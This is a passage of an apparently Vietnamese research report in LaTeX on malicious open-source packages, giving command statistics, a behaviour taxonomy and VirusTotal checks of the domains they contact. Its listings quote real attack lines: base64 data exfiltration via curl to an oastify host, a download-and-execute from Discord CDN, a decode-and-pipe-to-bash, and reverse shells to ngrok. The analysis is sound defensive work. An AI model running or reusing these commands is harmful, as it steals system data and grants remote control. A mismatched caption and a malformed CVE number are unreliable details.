    \item Thực hiện câu lệnh độc hại: Kẻ tấn công có thể chạy các câu lệnh PowerShell độc hại tải các mã độc từ bên ngoài về máy nạn nhân.
    \item Thực thi các tệp tin độc hại: các gói phần mềm độc hại kết nối đến máy chủ kiểm soát bởi kẻ tấn công và tải về các tệp tin độc hại hay mã độc. Sau đó thực thi chúng trên máy nạn nhân. 
\end{itemize}

Mặc dù các kỹ thuật của các gói phần mềm mã nguồn mở đơn giản, nhóm em tin rằng các gói phần mềm độc hại sẽ ngày càng trở nên phức tạp hơn, không chỉ về số lượng mà còn về sự tinh vi.

Bảng~\ref{tab:benign-package-commands} thống kê top mười câu lệnh được sử dụng nhiều nhất bởi các gói phần mềm lành tính. So sánh với top những câu lệnh được sử dụng phổ biến bởi các gói độc hại, \textit{ls} vẫn là câu lệnh được sử dụng nhiều nhất bởi các gói phần mềm lành tính. Trong các gói phần mềm lành tính, câu lệnh \textit{grep} được sử dụng nhiều đứng thứ hai, lệnh này thường được sử dụng để tìm kiếm hoặc sửa đổi các mẫu (regular pattern) văn bản trong tệp tin. Tương tự, các câu lệnh được sử dụng phổ biến bởi các gói độc hại, lệnh \textit{uname} cũng được các gói phần mềm lành tính sử dụng. Lệnh \textit{uname} được sử dụng để lấy các thông tin của hệ thống, chẳng hạn như tên của hệ điều hành. Tuy nhiên, các gói phần mềm lành tính không sử dụng thường xuyên các câu lệnh liên quan đến thực thi các tập lệnh shell (ví dụ \textit{bash}). Câu lệnh \textit{bash} được sử dụng để tạo và chạy một tập lệnh shell trên hệ điều hành Linux. Những kẻ tấn công có thể sử dụng kết hợp nhiều câu lệnh lại với nhau nhằm thực hiện các hành vi độc hại, bao gồm đánh cắp thông tin, cài đặt mã độc, chiếm quyền kiểm soát máy tính nạn nhân, v.v.

\subsubsection{Phân loại hành vi của các câu lệnh độc hại trong các gói độc hại}

Các gói phần mềm độc hại thường sử dụng kết hợp nhiều các câu lệnh độc hại với nhau để thực hiện những hành vi độc hại như đánh cắp thông tin các thông tin nhạy cảm, tải mã độc hay tập lệnh shell độc hại và thực thi trên máy nạn nhân v.v.  Để hiểu rõ hơn bản chất của những câu lệnh này trong các gói phần mềm độc hại cũng như các kỹ thuật của chúng sử dụng để qua mặt các công cụ phân tích tĩnh, nhóm em thực hiện phân tích thủ công các câu lệnh được sử dụng bởi các gói phần mềm độc hại. Qua đó nhóm em quan sát thấy các hành vi câu lệnh độc hại sử dụng bao gồm mã hóa dữ liệu, reverse shell, tải và thực thi mã độc trên máy nạn nhân.  
Sau đây nhóm em trình bày phân loại các câu lệnh độc hại được các gói phần mềm độc hại thực thi trong mẫu tập dữ liệu của nhóm em.

\hspace*{1em}\textbf{Thực hiện mã hóa và phát tán dữ liệu}: Các gói độc hại sử dụng kỹ thuật mã hóa cơ bản \textit{base64} trước khi truyền dữ liệu ra bên ngoài. ``topcoderhomepage\_3.0-1.0.2'' là gói phần mềm sử dụng kỹ thuật này được thể hiện trong Listing~\ref{lst:encode-technique}.


\begin{lstlisting}[language=bash, caption={Mã hóa dữ liệu trong topcoderhomepage\_3.0-1.0.2}, label={lst:encode-technique}]
curl -H "Hostname: $(hostname | base64)" \
     -H "uname: $(uname -a | base64)" \
     -H "Pwd: $(pwd | base64)" \
     -d $(ls -la | base64) \
      http://tnk9...7fd61wpl.oastify.com
\end{lstlisting}


\hspace*{1em}\textbf{Tải tập lệnh(script) độc hại từ bên ngoài sau đó thực thi trên máy nạn nhân}: Các gói độc hại thực hiện tải một tập lệnh độc hại từ các máy chủ kiểm soát bởi kẻ tấn công sau đó thực thi trên máy nạn nhân. Gói phần mềm độc hại sử dụng kỹ thuật này là ``biscits-1.0.1'' được thể hiện trong Listing~\ref{lst:external-download-technique}.


\begin{lstlisting}[language=bash, caption={Tải tệp lệnh độc hại sau đó thực thi trong biscits-1.0.1}, label={lst:external-download-technique}]
curl -s -o %temp%strings.bat 
    https://cdn.discordapp.com/
    attachments/11..55/strings.bat 
    && start /min cmd /c %temp%strings.bat
\end{lstlisting}

\hspace*{1em}\textbf{Thực hiện giải mã chương trình bị làm rối}: Gói phần mềm độc hại làm rối mã các câu lệnh độc hại của nó ví dụ \textit{base64}, sau đó khi được cài đặt trên máy nạn nhân, các lệnh bị mã hóa này được giải mã rồi thực thi. Loại kỹ thuật này được thể hiện trong Listing~\ref{lst:decode-encrypted-command-technique} của gói ``biscits-1.0.11''.

\begin{lstlisting}[language=bash, caption={Giải mã đoạn câu lệnh bị mã hóa sau đó thực thi trong calandraca-11.10.10}, label={lst:decode-encrypted-command-technique}]
echo "cm0gL3RtcC9mO21rZmlm...AxMC4yMC4zMC4yM 
     jggNDQ0MyA+L3RtcC9mCg==" | base64 -d | bash
\end{lstlisting}

\hspace*{1em}\textbf{Thực hiện truyền ngược (reverse shell)}: Để kiểm soát các máy tính nạn nhân và thực hiện nhận lệnh trực tiếp từ kẻ tấn công, các gói độc hại thực hiện câu lệnh reverse shell đến các tên miền được kiểm soát bởi kẻ tấn công. Gói phần mềm thực hiện câu lệnh như vậy là ``pmd-github-action-9.9.9" và ``watchman-search-ui-1.0.0'' thể hiện trong Listing~\ref{lst:reverse-shell-technique} và Listing~\ref{lst:reverse-shell-technique2}.

\begin{lstlisting}[language=bash, caption={Reverse shell trong pmd-github-action-9.9.9}, label={lst:reverse-shell-technique}]
bash -i >& /dev/tcp/0.tcp.in.ngrok.io/18121 0>&1
\end{lstlisting}

\begin{lstlisting}[language=bash, caption={Reverse shell trong watchman-search-ui-1.0.0}, label={lst:reverse-shell-technique2}]
export RHOST='0.tcp.in.ngrok.io';
export RPORT=14688;python -c
'import socket,os,pty;s=socket.socket();
s.connect((os.getenv('RHOST'),
int(os.getenv('RPORT'))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
pty.spawn('/bin/sh')'
\end{lstlisting}




\subsection{Phân tích thông kê hành vi các gói độc hại}.

Bảng~\ref{tab:malicious-package-behaviour} thống kê các hành vi độc hại được thực hiện bởi các gói phần mềm trong tập dữ liệu thu thập được của nhóm em, cụ thể là trong các kho lưu trữ npm, PyPI, crates.io, RubyGems. Lưu ý, nhóm em không tìm thấy thông tin của một gói độc hại từ kho lưu trữ Packagist từ các nguồn đa thu thập trong phần thu thập dữ liệu~\ref{fig:data-collection}. Bảng~\ref{tab:malicious-package-behaviour} cho thấy hầu hết các gói phần mềm đều kết nối tới một tên miền độc hại. Các gói phần mềm trong npm và PyPI thực hiện một hoặc nhiều các câu lệnh độc hại. Hơn nữa, một phần ba các gói phần mềm lưu trữ npm thực hiện cả hành vi giao tiếp với các tên miền độc hại và thực hiện các câu lệnh độc hại.

\begin{table}[htbp]
\centering
\rowcolors{2}{lightbrown}{white}
\small % Reduce font size
\begin{tabular}{p{2cm}p{3cm}p{3cm}p{3cm}}
\hline
            & \textbf{Gói phần mềm kết nối tới tên miền độc hại} & \textbf{Gói phần mềm thực hiện một hoặc nhiều các câu lệnh độc} & \textbf{Gói phần mềm kết nối tới tên miền độc hại và thực hiện một hoặc nhiều các câu lệnh độc hại} \\ \hline
crates.io   & 1     & 0  & 0  \\ \hline
npm         & 614   & 106 & 321 \\ \hline
PyPI        & 86    & 5   & 22 \\ \hline
RubyGems    & 16    & 0   & 0  \\ \hline
\end{tabular}
\caption{Bảng phân bố hành vi của các gói mã nguồn mở độc hại.}
\label{tab:malicious-package-behaviour}
\end{table}




Biểu đồ~\ref{fig:malicious-package-behaviour} cho ta thấy phân phối của các hành vi của các gói phần mềm trong các kho. Biểu đồ này cho ta thấy các gói kết nối tới một tên miền độc hại là hành vi phổ biến nhất, ngay sau đó là hành vi kết nối tới tên miền, và thực hiện các câu lệnh độc hại trên máy nạn nhân. Hành vi thực hiện câu lệnh độc hại ít phổ biến hơn, và chỉ xuất hiện ở các gói phần mềm npm và PyPI. Ngoài ra, chúng ta có thể thấy các gói RubyGems và crates.io chỉ thực hiện kết nối tới các tên miền độc hại, mà không thực thi lệnh trên máy nạn nhân.



\begin{figure}
    \centering
    \includegraphics[width=0.75\linewidth]{images/malicious-behaviours.png}
    \caption{Biểu đồ thể hiện phân bố các hành vi độc hại trong tập dữ liệu các gói mã nguồn mở độc hại}
    \label{fig:malicious-package-behaviour}
\end{figure}


Bảng~\ref{tab:malicious-package-describle} cho thấy số lượng phiên bản cũng như số lượng gói tương ứng trên từng kho lưu trữ của các gói phần mềm độc hại mà nhóm em đã thu thập. Trung bình mỗi gói có nhiều hơn hai phiên bản. Nhóm em nhận thấy npm có số lượng gói và số lượng phiên bản nhiều nhất trong dữ liệu mà nhóm em thu thập, xấp xỉ 90\%. Mặt khác, crates.io có số lượng gói cũng như số lượng phiên bản là thấp nhất. Điều này cho thấy ở thời điểm hiện tại, npm là kho lưu trữ mã nguồn mở mà những kẻ tấn công nhắm tới nhiều nhất nhằm đầu độc các chương trình độc hại lên kho lưu trữ này.
Do đó các nhà nghiên cứu nên nghiên cứu và các quản trị viên của kho lưu trữ này cần chú ý nghiên cứu và kiểm tra kĩ các gói mã nguồn được đăng tải lên để đảm bảo an toàn cho người dùng.

\begin{table}
\centering
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{lp{4cm}l}
\hline
            & \textbf{Số lượng gói}    & \textbf{Số lượng phiên bản}            \\ \hline
crates.io   & 1               & 10          \\ \hline
npm         & 1041              & 2293     \\ \hline
PyPI        & 113               &   216       \\ \hline
RubyGems    & 16                & 27        \\ \hline
Total    & 1171                & 2546        \\ \hline
\end{tabular}

\caption{Số lượng phiên bản và số lượng gói trên từng kho lưu trữ trong dữ liệu các gói độc hại.}
\label{tab:malicious-package-describle}
\end{table}




\subsection{Phân tích các kết nối mạng mà các gói kết nối tới} 

Các gói phần mềm mã nguồn mở độc hại thường kết nối đến các máy chủ bên ngoài, thường là các máy chủ độc hại được kiểm soát bởi những kẻ tấn công. Các kết nối này nhằm mục đích để nhận lệnh điều khiển hoặc phát tán các thông tin đánh cắp đến các máy chủ độc hại này. Trong phần này, nhóm em trình bày phân tích các tên miền cũng như các địa chỉ IP mà các gói phần mềm độc hại kết nối tới.

Biểu đồ~\ref{fig:distribution-number-security-vendors-flagged-domains} thể hiện sự phân bố số lượng các công cụ quét tên miền (security vendors) trên VirusTotal đánh dấu các tên miền trong dữ liệu nhóm thu thập trong phần~\ref{sec:data-collection}. Nhận thấy hầu hết các tên miền bị đánh dấu bởi ít nhất một công cụ quét tên miền. Có ít nhất 50 tên miền bị đánh dấu bởi hai công cụ quét tên miền trở lên. Những tên miền có số lượng các công cụ quét đánh dấu càng nhiều thì mức độ tin cậy của tên miền đó là độc hại càng cao.

Bảng~\ref{tab:malicious-indicators-frequency} cho thấy các gói phần mềm độc hại có số lượng kết nối tới các tên miền (URLs) nhiều hơn các gói lành tính (xấp xỉ 14 lần). Ngoài ra, nhóm em cũng quan sát thấy số lượng các tên miền duy nhất được các gói độc hại kết nối tới cũng nhiều hơn (xấp xỉ gần 113 lần so với các gói lành tính). Quan sát này chỉ ra rằng những kẻ tấn công đến từ nhiều nhóm khác nhau hoặc các tên miền của những kẻ tấn công này thay đổi khi bị phát hiện.

Bên cạnh các tên miền, các địa chỉ IP cũng là một yếu tố quan trọng khi phân tích các kết nối mạng của các gói phần mềm. Bảng~\ref{tab:malicious-indicators-frequency} cho thấy các gói độc hại kết nối tới các địa chỉ IP nhiều hơn gần 15 lần so với các gói lành tính. Bên cạnh đó, trong 37,423 các địa chỉ IP, có tới 15,927 (42.56\%) các địa chỉ IP bị đánh dấu là độc hại bởi ít nhất một công cụ quét IP trên VirusTotal.

Địa chỉ IP mà các gói độc hại kết nối tới có thể là vị trí của các máy chủ được kiểm soát bởi kẻ tấn công, ngược lại các địa chỉ IP mà các gói lành tính kết nối tới có thể là vị trí của các máy chủ cơ sở dữ liệu hay các máy chủ cung cấp các dịch vụ hợp pháp khác.






\begin{figure}
    \centering
    \includegraphics[width=0.75\linewidth]{images/Distribution-flagged-security-vendors-domains-virustotal.png}
    \caption{Bảng phân bố số lượng các công cụ quét tên miền trên VirusTotal đánh dấu các tên miền.}
    \label{fig:distribution-number-security-vendors-flagged-domains}
\end{figure}

\subsection{Phân tích các tên miền mà các gói độc hại kết nối tới}

Các gói phần mềm mã nguồn mở độc hại thường kết nối đến các tên miền độc hại nhằm tải các mã độc về máy nạn nhân, loại mã độc này gọi là \textit{droppers}. Một vài báo cáo gần đây cho thấy nhiều gói phần mềm trong các kho npm và PyPI được phát hiện là có chứa các dòng mã (code) độc hại được các kẻ tấn công chèn vào nhằm mục đích thực hiện các hành vi chiếm đoạt các tài nguyên của máy nạn nhân sử dụng Linux để cài đặt các phần mềm khai thác tiền điện tử (cryptominers) hay thực hiện đánh cắp thông tin, hoặc cài đặt mã độc Windows Trojans~\cite{cryptominers, infostealers, windows-trojan}. Các gói phần mềm độc hại cũng tải các đoạn chương trình (scripts) độc hại từ các máy chủ kiểm soát bởi kẻ tấn công và sau đó thực thi các đoạn chương trình độc hại này trên hệ thống máy nạn nhân.

Với các tên miền mà các gói phần mềm độc hại kết nối tới, nhóm em loại bỏ các trùng lặp thu thập được 1385 tên miền duy nhất trong đó có 75 tên miền chính (primary domain). Số lượng tên miền chính nhỏ hơn rất nhiều so với các tên miền phụ duy nhất mà các gói độc hại kết nối tới, điều này cho thấy các gói độc hại thường kết nối tới các tên miền độc hại cố định và sử dụng các tên miền phụ khác nhau cho các gói phần mềm độc hại khác nhau. Sau đó nhóm em quét tất cả các tên miền này trên VirusTotal, cụ thể nhóm em quét 75 tên miền chính.

Biểu đồ~\ref{fig:number-of-security-flagged-domain-malicious-set} thể hiện số lượng các công cụ quét tên miền của VirusTotal đánh dấu các tên miền chính của các gói độc hại kết nối tới. Biểu đồ cho thấy 55 tên miền trong tổng số 75 tên miền chính bị đánh dấu bởi ít nhất một công cụ quét tên miền, chiếm tỉ lệ 73\%. Bảng~\ref{tab:malicious-indicators-frequency} cho thấy số lượng các gói địa chỉ IP mà các gói độc hại kết nối tới nhiều hơn các gói lành tính (xấp xỉ 15 lần). 

\begin{figure}
    \centering
    \includegraphics[width=0.75\linewidth]{images/number-flagged-security-vendors-domain-malicious-set.png}
    \caption{Số lượng các công cụ quét tên miền trên VirusTotal đánh dấu các tên miền trong các gói độc hại}
    \label{fig:number-of-security-flagged-domain-malicious-set}
\end{figure}

Qua quan sát, nhóm em nhận thấy các gói tên miền độc hại sử dụng các tên miền OAST. Đây là các tên miền được sử dụng trong ứng dụng kiểm thử web burpsuite~\cite{portswiggerBurpSuite} để tìm kiếm các lỗ hổng bảo mật trên các trang web. Kẻ tấn công sử dụng công cụ này để tìm kiếm các lỗ hổng trên các nạn nhân bằng cách sử dụng các tên miền này. Các tên miền OAST này có liên quan đến lỗ hổng CVE-2024-221887~\cite{oast}, lỗ hổng này cho phép kẻ tấn công thực hiện các câu lệnh độc hại trên hai sản phẩm bảo mật mạng là Ivanti Connect Secure (9.x, 22.x) và Ivanti Policy Secure (9.x, 22.x).

Bảng~\ref{tab:oast-domains} cho thấy các tên miền OAST đã bị ít nhất hai công cụ quét tên miền trên VirusTotal đánh dấu. Các nhãn đánh dấu bao gồm: Độc hại, Lừa đảo (Phishing) và Mã độc.

\begin{table}[htbp]
\centering
\small % Reduce font size
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{p{4.5cm}p{4.5cm}p{4.5cm}}
\hline
\textbf{Tên miền OAST} & \textbf{Số lượng công cụ quét đánh dấu} & \textbf{Các nhãn bị đánh dấu} \\ \hline
oast.fun      & 11                               & Độc hại, Đáng ngờ, Lừa đảo \\ \hline
oast.me       & 11                               & Độc hại, Mã độc, Lừa đảo \\ \hline
oast.live     & 10                               & Độc hại, Mã độc, Lừa đảo \\ \hline
oast.pro      & 10                               & Độc hại, Mã độc, Lừa đảo, Đáng ngờ \\ \hline
oast.site     & 10                               & Độc hại, Mã độc, Lừa đảo, Đáng ngờ \\ \hline
oast.online   & 7                                & Độc hại, Lừa đảo, Đáng ngờ \\ \hline
oastify.com   & 2                                & Độc hại \\ \hline
\end{tabular}
\caption{Thống kê các tên miền OAST bị đánh dấu bởi các công cụ quét tên miền trên VirusTotal}
\label{tab:oast-domains}
\end{table}

Bên cạnh tên miền OAST, nhóm em cũng thống kê các tên miền mà các gói độc hại kết nối tới nhiều nhất và các nhãn được các công cụ quét tên miền trên VirusTotal đánh dấu. Kết quả được thể hiện trong phụ lục~\ref{tab:appendix-malicious-domains-flagged-avs}. Nhóm em nhận thấy tương tự như các tên miền OAST, hầu hết các tên miền mà các gói độc hại kết nối tới đều bị đánh dấu nhãn là độc hại, lừa đảo và mã độc.

